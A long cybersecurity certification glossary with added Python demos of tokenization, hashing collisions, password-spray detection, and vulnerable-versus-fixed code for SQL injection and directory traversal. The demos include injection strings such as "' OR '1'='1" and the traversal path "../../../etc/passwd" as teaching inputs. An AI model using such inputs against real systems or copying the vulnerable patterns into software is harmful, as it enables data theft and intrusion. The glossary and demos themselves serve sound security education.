The phase of the IRC where you build the tools, processes, and procedures to respond to an incident. Includes building and training an Incident Response team, and acquiring, configuring, and operating security tools and incident response capabilities.
Containment
The phase of the IRC where, once an incident has been identified, the IRT needs to contain it to prevent further issues or damage. This can be challenging and may not be complete if elements of the incident are not identified in the initial identification efforts.
Provenance
The place or source of origin of any data; where an image or drive came from and what happened with it.
Crossover error rate
The point where the false acceptance rate (FAR) crosses over with the false rejection rate (FRR). A lower CER indicates a more accurate biometric system.
Dark web
The portion of the internet that is intentionally hidden from search engines, uses masked IP addresses, and is accessible only with a special web browser.
Risk register
The primary tool that risk management professionals use to track risks facing the organization; a document in which the results of risk analysis and risk response planning are recorded.
Data minimization
The principle that organizations only collect the smallest possible amount of information necessary to meet their business requirements; in data protection, the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose.
Lateral Movement
The process by which an attacker is able to move from one part of a computing environment to another.
Anonymization
The process in which individually identifiable data is altered in such a way that it no longer can be related back to a given individual.
Normalization
The process of applying rules to a database design to ensure that information is divided into the appropriate tables.
Code signing
The process of digitally signing software with the publisher's private key and distributing the signature together with a certificate that binds the matching public key to the publisher; anyone installing the code can verify who published it and that it has not been modified since it was signed.
Risk awareness
The process of being consistently informed about the risks in one's organization or specific department; involves evaluating assets, vulnerabilities, and threats in order to clearly define an organization's risk level.
Pulping
The process of breaking paper documents into wood pulp, removing ink; materials can be recycled
Boot attestation
The process of verifying that the boot process is valid: measurements of each boot stage are recorded in the TPM, and a report of that boot-state integrity data, signed with a key protected by the tamper-resistant TPM, is sent to a network server for evaluation.
Full Disk Encryption (FDE)
The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product
Privilege escalation
The process of gaining elevated rights and permissions. Malware typically uses a variety of techniques to obtain this.
Infrastructure as code
The process of managing and provisioning computer data centers through machine-readable definition files rather than physical hardware configuration or interactive configuration tools.
Threat hunting
The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.
Degaussing
The process of removing or rearranging the magnetic field of a disk in order to render the data unrecoverable; magnetically wipes data from tapes and traditional magnetic media like hard drives. It has no effect on SSDs and other flash media, which need cryptographic erase or physical destruction instead.
Tokenization
The process of replacing sensitive data with non-sensitive substitute values (tokens) that can stand in for the original data in business processes; a token has no exploitable value on its own and can be mapped back to the original only through a separately secured lookup (the token vault).
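An added illustration of the tokenization entry above (example code written for this review, not part of the original card set): a minimal token vault for card numbers. The vault, the preserved last-four-digits format and the sample card numbers are assumptions chosen for the example; the point is that the token is random, reveals nothing about the original, and is reversible only through the vault.

```python
import secrets
import string


class TokenVault:
    """Substitutes random tokens for sensitive values (here, card numbers).
    A token keeps only the last four digits for customer-service lookups;
    the rest is random and carries no information about the original value,
    which can be recovered only through the vault's mapping (assumed design)."""

    def __init__(self):
        self._by_token = {}
        self._by_value = {}

    def tokenize(self, value: str) -> str:
        if value in self._by_value:
            return self._by_value[value]          # same input, same token (referential integrity)
        while True:
            random_part = "".join(secrets.choice(string.digits) for _ in range(12))
            token = random_part + value[-4:]        # 16 digits, last four preserved
            if token not in self._by_token and token != value:
                break
        self._by_token[token] = value
        self._by_value[value] = token
        return token

    def detokenize(self, token: str) -> str:
        """Only callers with vault access can reverse a token."""
        if token not in self._by_token:
            raise KeyError("unknown token")
        return self._by_token[token]


def mask(token: str) -> str:
    """What a downstream system may display: only the preserved last four digits."""
    return "*" * (len(token) - 4) + token[-4:]


if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111111111111111"                     # constructed test card number
    tok = vault.tokenize(pan)
    print(tok, mask(tok), vault.detokenize(tok) == pan)
```

Because the token keeps the same length and character set as the card number, existing databases and reports can store it unchanged, while a breach of those systems yields only tokens.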
static code analysis
The process of reviewing source code while it is in a static state; i.e., it is not executing.
Social media analysis
The process of scouring social media and the wider Internet to gather personal information and build a fuller profile of a person's attitudes, interests, relationships, and experiences; used in background screening and, by attackers, in reconnaissance for social engineering.
Rooting/Jailbreaking
The process of taking root access on a mobile device.
Carrier unlocking
The process of unlocking a mobile phone from a specific cellular provider.
Ciphering
The process of applying a cipher to scramble (encrypt) a message.
E-discovery
The processes by which electronic data that might be used as legal evidence are requested, secured, and searched; this is often used for public records, Freedom of Information Act requests, and investigations.
Admissibility
The quality of the evidence in a case that allows it to be presented to the jury; evidence typically falls under this category if it is offered to prove the facts of a case and it does not violate the law; criteria includes relevance, reliability, whether it was obtained legally, authentic, etc.
Broadcast storm
The result of one or more devices sending a nonstop flurry of broadcast frames on the network.
protocol analyzer output
The returned data from hardware or software that captures packets to decode and analyze their contents.
Control risk
The risk that arises from the potential that a lack of internal controls within the organization will cause a material misstatement in the organization's financial reports.
Residual risk
The risk that remains after an organization implements controls designed to mitigate, avoid, and/or transfer the inherent risk.
Non-repudiation
The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place.
Domain name system (DNS)
The service that translates domain names (hostnames) to IP addresses, and vice versa.
Key length
The size of a key, usually measured in bits, that a cryptographic algorithm uses in ciphering or deciphering protected information.
Public key infrastructure
The system of hardware, software, policies, and procedures for issuing, managing, and revoking digital certificates that bind public keys to identities, together with the public/private key pairs those certificates vouch for.
Employee Offboarding
The tasks performed when an employee leaves the enterprise, such as disabling accounts, revoking access and credentials, and recovering equipment.
Incident response team
The team that manages and executes the IR plan by detecting, evaluating, and responding to incidents.
Hotspot
The term used when a mobile device provides internet to wireless devices by using Wi-Fi
Shared and Generic Accounts/Credentials
The type of account that allows multiple users to utilize the same account; typically prohibited by proper account management in order to maintain identification, authentication, authorization, and accounting
Guest accounts
The type of account that is useful if you want to grant someone limited access to a computer or network without creating a new account.
Service accounts
The type of account used to provide privileged access used by system services and core applications
Bluesnarfing
The unauthorized access of information from a wireless device through a Bluetooth connection.
Typosquatting
The unethical practice of registering domain names very similar to those of high-volume sites in hopes of receiving traffic from users seeking the high-volume site who mistakenly enter an incorrect URL in their browsers.
Message digest
The fixed-length output value derived from the content of a message, unique in practice; a small representation of a larger message. A message digest provides integrity checking; combined with a key (HMAC) or a digital signature it also provides authentication. It does not provide confidentiality.
Trust model
The use of a trusted third party to verify the trustworthiness of a digital certificate.
Predictive analysis
The use of data warehouses and complex algorithms to forecast future events, based on historical trends and calculated probabilities
Multipath Solutions
The use of multiple network paths to ensure that a severed cable or failed device will not cause a loss of connectivity.
Threat vectors
The path or means by which an attacker reaches a target, such as email, removable media, wireless networks, direct network access, or the supply chain.
How are common languages such as Python, Perl, and Bash leveraged as part of an attack process?
These languages can be used to create persistent remote access using bind or reverse shells, as well as a multitude of other useful exploit tools.
Why should shared and generic accounts be avoided when applicable?
They are difficult to troubleshoot or audit in the event of a breach, because multiple users share them and actions cannot be attributed to an individual. Each user should have their own non-admin account.
Why is it important to place datacenters and other facilities a significant distance away from one another?
This distance prevents most common natural disasters from disabling both (or more) datacenters. Additionally, it helps ensure that facilities will not be impacted by issues with the power grid, network connectivity, and other similar issues.
Application deny/block listing
This lists applications or files that are not allowed on a system and will prevent them from being installed or copied to the system.
Application allow listing
This lists the applications and files that are allowed to be on a system and prevents anything that is not on the list from being installed or run; a security option that prohibits unauthorized software from executing.
The meaning of a wildcard included in a certificate name
This means that the certificate is good for subdomains of the registered domain as well (only one level, though). It is indicated by an asterisk as the leftmost label, for example *.example.com, which covers www.example.com but not example.com itself or a.b.example.com.
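An added example of the one-level wildcard rule above (written for this review, not code from the original card set): a hostname matcher that applies the rule a TLS client uses when comparing a certificate name against the host it connected to. The function names and the example domains are assumptions; the matching rules follow the common practice of honouring a wildcard only as the entire leftmost label.

```python
def cert_name_matches(pattern: str, hostname: str) -> bool:
    """Return True if the certificate name `pattern` covers `hostname`.
    Matching is case-insensitive. A wildcard is honoured only when it is the
    entire leftmost label, and it matches exactly one label, so '*.example.com'
    covers 'www.example.com' but not 'example.com' or 'a.b.example.com'."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or any("*" in label for label in p_labels[1:]):
        return False                  # reject 'w*.example.com' and '*' in any other position
    if len(p_labels) < 3:
        return False                  # refuse '*.com': it would cover every .com host
    if len(h_labels) != len(p_labels) or not h_labels[0]:
        return False                  # wildcard matches exactly one non-empty label
    return h_labels[1:] == p_labels[1:]


def host_covered(cert_names, hostname: str) -> bool:
    """True if any Subject Alternative Name on the certificate covers hostname."""
    return any(cert_name_matches(name, hostname) for name in cert_names)


if __name__ == "__main__":
    sans = ["example.com", "*.example.com"]       # constructed certificate names
    for host in ["example.com", "www.example.com", "a.b.example.com"]:
        print(host, host_covered(sans, host))
```

Note that a certificate for *.example.com alone does not cover the bare domain, which is why real certificates usually list both example.com and *.example.com as Subject Alternative Names.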
Geographic dispersal
Placing facilities (datacenters, backups, staff) in different geographic locations so that a single disaster, attack, or failure cannot disable or destroy all of them.
Criminal syndicates
Threat actors who have moved from traditional criminal activities to more rewarding and less risky online attacks.
What is the purpose of hash functions?
To take a message of any length and generate a fixed-length output value (the digest) derived from its content, such that any change to the message changes the digest and it is infeasible to find two messages with the same digest.
Configuration review
A review of a device's or system's settings to verify its operating condition and the effectiveness of its security configuration and rule sets.
Mobile Device Management (MDM) (or UEM)
Tools that allow a device to be managed remotely.
Software development kit
Tools that allow the creation of products or add-ons for a specific operating system or other computing platform
IP scanners
Tools that scan through a range of IP addresses and report which hosts respond.
Exploitation frameworks
Tools (such as Metasploit) that bundle exploit modules, payloads, and post-exploitation tooling in one framework. They are used by penetration testers (and attackers) to detect and exploit vulnerabilities in software.
Four major information classification categories of the US government
Top secret, secret, confidential, unclassified
Hashing
Transforming plaintext of any length into a short code called a hash
Tethering
Transforms a smartphone or Internet-capable tablet into a portable communications device that shares its Internet access with other computers and devices wirelessly; the act of using a cellular-network-connected mobile device as a mobile hotspot.
Two types of IPSec modes
Transport and tunnel
Two types of SOC reports
Type 1 and type 2
2 examples of volume-based network DDoS attacks
UDP floods and ICMP floods
(Managed) PDUs
Units that are used to provide intelligent power management and remote control of power delivered inside server racks and other environments.
Drone
Unmanned aerial vehicle that can be used to capture images of a site, to deliver a payload, or even to take action like cutting a wire or blocking a camera; aren't a critical concern for most, but are increasingly an element that needs to be considered.
Spam
Unsolicited, unwanted commercial email messages
Background checks
Used by employers to verify the accuracy of the information you provided on your resume or job application. Items checked include: employment verification, education background/degrees, references, credit history, medical records, driving record, court records, and criminal records.
Bridge Protocol Data Unit (BPDU)
Used by switches to share information with other switches that are participating in the Spanning-Tree Protocol
Legacy platforms
Used to describe systems that are no longer being marketed or supported
Software Defined Networking (SDN)
Using a central control program separate from network devices to manage the flow of data on a network
Forensic technique used to recover data from drives and devices
File carving: using a recovery tool or working manually, review the drive, find files based on headers or metadata, and recover the file(s) and file fragments. Fragments of files can still be recovered in cases where a file has been partially overwritten.
Sandboxing
Using a virtual machine to run a suspicious program to determine if it is malware.
Why is it important to implement a diversity of technologies when building resilience into an infrastructure?
Using different vendors, cryptographic solutions, platforms, and controls can make it more difficult for a single attack or failure to have system- or organization- wide impacts.
scanless
Utility that runs port scans through third-party websites so the probes originate from those sites' addresses rather than the operator's, evading simple detection and attribution.
Auto-update
Utility which automatically updates systems software as new releases become available.
4 third-party risks
Vendor management; supply chain; outsourced code development; data storage
9 research sources for threat intelligence
Vendor websites; vulnerability feeds; conferences; academic journals; Requests for Comments (RFCs); local industry groups; social media; threat feeds; adversary tactics, techniques, and procedures (TTPs)
Attributes listed on every digital certificate
Version of X.509 to which the certificate conforms; serial number (assigned by the issuing CA); signature algorithm identifier; issuer name; validity period (not before / not after); subject name, including the common name (CN); Subject Alternative Name (optional in the standard, but the field browsers actually match hostnames against); subject's public key; the issuer's digital signature over all of the above.
CPU cache volatility level
Very volatile - cache contents and registers change constantly as processing occurs, so in the order of volatility they are collected first (if they can be collected at all).
Ten use cases for using secure protocols (hint: think of what each secure protocol does)
Voice and video; time synchronization; email and web; file transfer; directory services; remote access; domain name resolution; routing and switching; network address allocation; subscription services
2 major categories of Network DDoS attacks
Volume-based and protocol-based
Four wireless cryptographic protocols
WPA2, WPA3, CCMP, SAE
What is the biggest (or one of the biggest) security concerns with IoT devices?
Weak default settings
Four major types of sprinklers
Wet, dry, pre-action, deluge
Hashing collision
When a hash function produces the same value for two different inputs; the discovery of practical collisions typically leads to the deprecation of a hashing algorithm (as happened with MD5 and SHA-1).
False negative
When a vulnerability scan fails to report a true threat.
False positive
When a vulnerability scan reports a threat that is not really one.
Tailgating
When an unauthorized individual enters a restricted-access building by following an authorized user.
Dual-supply
When two independent power supply units, either of which is capable of handling the full load, are used; ensures that a single power supply failure won't disable a server.
Bluetooth
Wireless PAN technology that transmits signals over short distances between cell phones, computers, and other devices
Wi-Fi
Wireless local area network that uses radio signals to transmit data.
Intermediate CA
a CA that issues certificates to child CAs (or end entities) and is itself issued a certificate by a root CA, creating a certificate chain
Cloud reference architecture
a document published by NIST that offers a high-level taxonomy for cloud services; a vision for how the elements of the architecture fit together.
Extranet
a network configuration that allows select personnel outside of an organization to access internal information systems
Port tap
a purpose-built device that passively makes a copy of network data but does not alter the data. Once you install it, you are done. No programming is required.
Artificial Intelligence
a subdiscipline of computer science that attempts to simulate human thinking; focuses on accomplishing "smart" tasks by combining ML, deep learning, and related techniques
Screened subnet
also known as DMZ; used to contain systems that are accessible by the outside world or some other less secure population; commonly uses two firewalls; one resides between the public network and DMZ and the other resides between the DMZ and the private network; can be logical or physical segments of a network
Simple Network Management Protocol version 3
an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior; version 3 adds authentication and encryption, which versions 1 and 2c (with their plaintext community strings) lack
Jurisdiction
an area of authority or control; the right to administer justice; concerns may extend beyond which law covers the overall organization. Ex: Cloud providers often have sites around the world, and data replication and other services elements mean that your data or services may be stored or used in a similarly broad set of locations. This "area" may claim rights to access that data with a search warrant or other legal instrument.
Digital signature
a value computed over a message (normally over its hash) with the sender's private key and attached to the message; anyone holding the matching public key can verify it, which proves who signed the message, shows it was not altered, and supports non-repudiation
Authorized hackers
an ethical hacker with good intentions and permission to hack (white hat)
Five data roles/responsibilities that should be assigned to a person/people in any organization
data owner, data controller, data processor, data custodian/steward, data protection officer
Three ways to prove integrity of forensic data
hashing, checksum, provenance
Examples of file manipulation commands
head, tail, cat, grep, chmod, logger
Examples of ephemeral data
process table, kernel statistics, the system's ARP cache
Cipher
the generic term for a technique (or algorithm) that performs encryption; a method used to scramble or obfuscate characters to hide their value
NIC teaming
the process of grouping together two or more physical NICs into one single logical NIC, which can be used for network fault tolerance and increased bandwidth through load balancing
(Certificate) enrollment
"The process of requesting, receiving, and installing a certificate."; the process of proving your identity to the CA in some manner in order to obtain a digital certificate
Worms
Independent computer programs that copy themselves from one computer to other computers over a network
Driver manipulation
A software attack where the attacker rewrites or replaces the legitimate device driver or application programming interface (API) to enable malicious activity to be performed
Jamming
A DoS attack against wireless networks. It transmits noise on the same frequency used by a wireless network.
Birthday attack
A cryptographic attack that exploits the birthday paradox: finding any two inputs that produce the same digest (a collision) takes only about 2^(n/2) attempts for an n-bit hash, far fewer than the 2^n needed to match one specific digest.
Downgrade attack
A cryptographic attack; an attack in which the system is forced to abandon the current higher security mode of operation and fall back to implementing an older and less secure mode.
Supply-chain attacks
A cyber-attack that seeks to damage an organization by targeting less-secure elements in the supply chain.
Refactoring
A driver manipulation method. The attacker rewrites the driver's code so that it still performs its normal function (its observable behavior is unchanged) while also carrying out malicious actions.
Shimming
A driver manipulation method. It uses additional code to modify the behavior of a driver.
Watering Hole Attack
A malicious attack that is directed toward a small group of specific individuals who visit the same website.
Pass the hash
A password attack that captures and uses the hash of a password. It attempts to log on as the user with the hash and is commonly associated with the Microsoft NTLM protocol.
Dictionary attack
A password attack that hashes each word in a list of common words and compares the results against the hashes in a stolen password file.
Whaling
A phishing attack targeted to senior business executives, government leaders, and other high-level positions.
Pharming
A phishing attack that reroutes requests for legitimate websites to false websites.
Spear phishing
A phishing attack that targets only specific users.
Malicious flash drive
A physical device that contains malicious PDFs, executables, etc. that could be harmful to your computer; older systems would automatically run content from such a device (AutoRun) without user consent
Resource exhaustion
A situation in which a hardware device with limited resources (CPU, memory, file system storage, etc.) is exploited by an attacker who intentionally tries to consume more resources than intended.
Cross-site request forgery (XSRF)
An attack that exploits the trust a website has in a user's browser in an attempt to transmit unauthorized commands to the website.
Dynamic Link Library (DLL) injection
An attack in which a malicious process forces another running Windows application to load a dynamic-link library (DLL) of the attacker's choosing into its memory, so the attacker's code runs with that application's privileges; it may also cause instability (crashes) or leak sensitive information. Mitigations include loading DLLs only by fully qualified path, verifying DLL signatures, and protecting processes from untrusted code injection.
Spyware
A special class of adware that collects data about the user and transmits it over the Internet without the user's knowledge or permission
Phishing
A technique to gain personal information for the purpose of identity theft, usually by means of fraudulent e-mail
Eliciting Information
A technique used to gather information without targets realizing they are providing it
Offline Brute Force Attack
A type of attack in which the attacker tries all possible character combinations against password hashes obtained from captured traffic or a stolen database, cracking the password offline where no lockout can interfere.
Structured Query Language (SQL) injection
A type of attack in which the hacker adds SQL code to a Web or application input to gain access to or alter data in the database.
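An added example for the SQL injection entry above (example code written for this review, not from the original card set): a login check built by string concatenation beside the parameterized version. The sqlite3 in-memory database, table layout, and user rows are constructed for the example; plaintext passwords are used only to keep the injection visible, and a real system would store salted password hashes.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Builds the query by string formatting, so quotes in the input become SQL.
    username "bob'--" comments out the password check; password "' OR '1'='1"
    turns the WHERE clause into a tautology that returns every user."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(query))


def login_safe(conn, username: str, password: str) -> list:
    """Parameterized query: the driver passes the values separately from the
    SQL text, so they can never change the statement's structure."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "alice", "' OR '1'='1"))   # every user id
    print(login_safe(conn, "alice", "' OR '1'='1"))         # no match
```

The parameterized form is the fix; escaping quotes by hand is fragile and should be avoided.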
Online Brute Force Attack
A type of attack that attempts to guess all possible character combinations against a live system; can be thwarted by account lockout and rate limiting on the application.
Keyloggers
Malware or hardware that records keystrokes to provide cybercriminals with confidential data such as passwords
Extensible Markup Language (XML) injection
A type of code injection attack in which the attacker attempts to embed code in XML documents.
Lightweight Directory Access Protocol (LDAP) injection
A type of code injection attack in which the attacker embeds commands in text being sent as part of a LDAP query
Collision attack
A type of cryptographic attack; an attempt to find two input strings of a hash function that produce the same hash result.
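An added example covering the hashing, message digest, hash collision, birthday attack and collision attack entries on this page (written for this review, not code from the original card set). It computes fixed-length digests, shows the keyed variant (HMAC) that turns an integrity check into an authentication check, and runs a birthday attack against a deliberately truncated digest; the truncation to 24 bits is an assumption made so the collision appears in a few thousand attempts instead of 2^128.

```python
import hashlib
import hmac


def digest(message: bytes) -> str:
    """Fixed-length SHA-256 digest (hex) of a message of any length."""
    return hashlib.sha256(message).hexdigest()


def mac(key: bytes, message: bytes) -> str:
    """Keyed digest (HMAC-SHA256): only a holder of `key` can produce or verify it,
    which is what turns an integrity check into an authentication check."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, message: bytes, tag: str) -> bool:
    # compare_digest runs in constant time so timing does not leak how many bytes matched
    return hmac.compare_digest(mac(key, message), tag)


def truncated_digest(message: bytes, bits: int) -> int:
    """Toy hash: the leading `bits` bits of SHA-256, small enough that collisions
    can be found in seconds (the assumption that makes the demo practical)."""
    full = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return full >> (256 - bits)


def birthday_collision(bits: int, limit: int = 1_000_000):
    """Birthday attack: hash distinct messages until any two share a digest.
    Returns (message_a, message_b, attempts) or None if `limit` is exhausted.
    Expected attempts are about 2**(bits/2), not 2**bits."""
    seen = {}
    for i in range(limit):
        msg = b"msg-%d" % i               # every message is distinct by construction
        h = truncated_digest(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
    return None


if __name__ == "__main__":
    print(digest(b"abc"))
    a, b, tries = birthday_collision(24)
    print(a, b, tries)                    # two inputs, one 24-bit digest, ~4096 tries
```

For a 24-bit digest the attack needs on the order of 2^12 attempts; the same arithmetic is why 128-bit digests (MD5) offer at most 64 bits of collision resistance and why a digest alone, without a key or a signature, cannot authenticate a message.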
Replay Attack
A type of network attack where an attacker captures network traffic and stores it for retransmission at a later time to gain unauthorized access to a network.
Example of a TOC/TOU scenario
An OS builds a comprehensive list of access permissions for a user upon logon and then consults that list throughout the session, so permissions revoked after logon (the time of check) are still honored when the user later acts (the time of use)
Request forgeries
An attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated.
Buffer Overflow Attack
An attack that occurs when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer.
Bluejacking
An attack that sends unsolicited messages to Bluetooth-enabled devices.
Directory Traversal
An attack that uses path sequences such as ../ in user-supplied file names to move from the application's intended directory into restricted directories and read or write files there.
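An added example for the directory traversal entry above (example code written for this review, not from the original card set): a naive path join beside a resolver that refuses anything outside the document root. The BASE_DIR value and the request paths are assumptions, and the check assumes a POSIX filesystem.

```python
import os
from typing import Optional

BASE_DIR = "/srv/app/files"   # assumed document root for the example; any directory works


def vulnerable_path(user_path: str) -> str:
    """Naive join: '..' segments walk out of BASE_DIR, and an absolute
    user_path makes os.path.join discard BASE_DIR altogether."""
    return os.path.join(BASE_DIR, user_path)


def safe_path(user_path: str) -> Optional[str]:
    """Resolve user_path under BASE_DIR and refuse anything that escapes it.
    realpath collapses '..' and follows symlinks; commonpath (rather than a
    startswith check) stops '/srv/app/files2' from passing as inside BASE_DIR."""
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for requested in ["docs/report.pdf", "../../../etc/passwd", "/etc/passwd", "../files2/x"]:
        print(requested, "->", vulnerable_path(requested), "|", safe_path(requested))
```

The resolved path must be checked after normalization and symlink resolution, not before; filtering the string "../" out of the input is easily bypassed with encodings such as ..%2f or with symlinks inside the document root.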
Server-Side Request Forgery (SSRF)
An attack that tricks a server into visiting a URL based on user-supplied input; these attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL.
Spraying attack
A password attack that tries a small number of common passwords against many accounts, staying under each account's lockout threshold; the account names are often guessed from the organization's naming convention.
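An added example covering the online brute force and spraying entries (written for this review, not code from the original card set): a per-account lockout policy, which stops a brute-force run against one account, replayed alongside a spray that never trips it, plus the detection logic that catches the spray from the other axis. The lockout threshold of five, the source addresses, and the authentication log entries are all constructed for the example.

```python
from collections import defaultdict

LOCKOUT_THRESHOLD = 5      # assumed policy: lock after 5 consecutive failures


class LockoutPolicy:
    """Per-account lockout: the defence against online brute force."""

    def __init__(self, threshold: int = LOCKOUT_THRESHOLD):
        self.threshold = threshold
        self.failures = defaultdict(int)
        self.locked = set()

    def attempt(self, account: str, success: bool) -> str:
        if account in self.locked:
            return "locked"
        if success:
            self.failures[account] = 0
            return "ok"
        self.failures[account] += 1
        if self.failures[account] >= self.threshold:
            self.locked.add(account)
            return "locked"
        return "failed"


def simulate(events, threshold: int = LOCKOUT_THRESHOLD) -> list:
    """Replay (source_ip, account, success) events through the policy."""
    policy = LockoutPolicy(threshold)
    return [policy.attempt(account, ok) for _, account, ok in events]


def detect_spray(events, min_accounts: int = 10) -> set:
    """Lockout never fires for a spray (one guess per account), so detect it
    from the other axis: one source failing against many distinct accounts."""
    failed_accounts = defaultdict(set)
    for ip, account, ok in events:
        if not ok:
            failed_accounts[ip].add(account)
    return {ip for ip, accounts in failed_accounts.items() if len(accounts) >= min_accounts}


# Constructed sample authentication logs: (source_ip, account, success)
BRUTE_FORCE = [("10.0.0.5", "alice", False)] * 6 + [("10.0.0.5", "alice", True)]
SPRAY = [("10.0.0.9", f"user{n:02d}", False) for n in range(1, 13)]

if __name__ == "__main__":
    print(simulate(BRUTE_FORCE))            # locked from the 5th failure on, even for the real user
    print(simulate(SPRAY))                  # every attempt just 'failed'; no account locks
    print(detect_spray(BRUTE_FORCE + SPRAY))  # {'10.0.0.9'}
```

Note the side effect visible in the brute-force replay: once the account is locked, the legitimate user's correct password is rejected too, which is why lockout thresholds are paired with a time-based unlock or rate limiting rather than a permanent lock.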
Logic bombs
An instruction in a computer program that triggers a malicious act
Memory leak
An undesirable state in which a program requests memory but never releases it, which can eventually prevent other programs from running.
Session Replay Attack
Attacker listens to the conversation between the user and the server and captures the authentication token of the user
API attacks
Attacks on an API. API attacks attempt to discover and exploit vulnerabilities in APIs.
Cloud-based attacks
Attacks on cloud-based services; the target is likely a well-secured provider datacenter, but one in which it is far harder to determine which physical systems your workloads are running on or to obtain physical evidence.
On-premise attacks
Attacks on systems that reside on premises; because the equipment is on site, you can audit physical access to the facility and examine what happened to a specific physical machine.
Shoulder surfing
Gaining compromising information through observation (as in looking over someone's shoulder).
Error handling
Coding methods to anticipate and deal with exceptions thrown during execution of a process.
Tainted training data for machine learning (ML)
Data that confuses the artificial intelligence (AI) machine during the training process; attackers send modified training data that causes the AI to behave incorrectly and ineffectively.
Malicious universal serial bus (USB) cable
Engineered USB cables that carry malware; they're less common since they require dedicated engineering to build, rather than simply buying commodity flash drives
Pretexting
Occurs when someone improperly accesses your personal information by posing as someone who needs data for one reason or another
Principle of intimidation
Principle (of social engineering) that relies on scaring or bullying an individual into taking a desired action; the individual who is targeted will feel threatened and respond by doing what the social engineer wants them to do
Principle of Familiarity
Principle (of social engineering) that relies on the victim liking the individual, or the organization the individual claims to represent, and thus thinking everything is "normal."
Principle of Consensus
Principle (of social engineering) that uses the fact that people tend to want to do what others are doing to persuade them to take an action
Principle of Authority
Principle (of social engineering) that we are more likely to agree to a request made by an authority figure
Bots
Remotely controlled systems or devices that have a malware infection; groups of bots are known as botnets.
Credential harvesting
Social engineering techniques for gathering valid credentials to use to gain unauthorized access.
Backdoor
Software code that gives access to a program or a service that circumvents normal security protections.
Improper input handling
Software that allows the user to enter data but does not validate or filter user input to prevent a malicious action.
Ransomware
Software that encrypts programs and data and demands a ransom in exchange for the decryption key.
Fileless virus
Malware that uses legitimate, already-installed programs (such as PowerShell or WMI) to infect a computer. It runs in memory rather than as a file on disk, leaving little footprint and making it challenging to detect and remove.
Invoice scams
The act of using a fake invoice in an attempt to get a company to pay for things it has not ordered
Hybrid Warfare
a new term used to describe a strategy that deliberately mixes elements and techniques of conventional warfare (e.g., national uniforms, heavy weapons) and unconventional warfare (e.g., guerrilla, paramilitary, information, or cyber war) as a way to coerce adversaries while avoiding attribution and retribution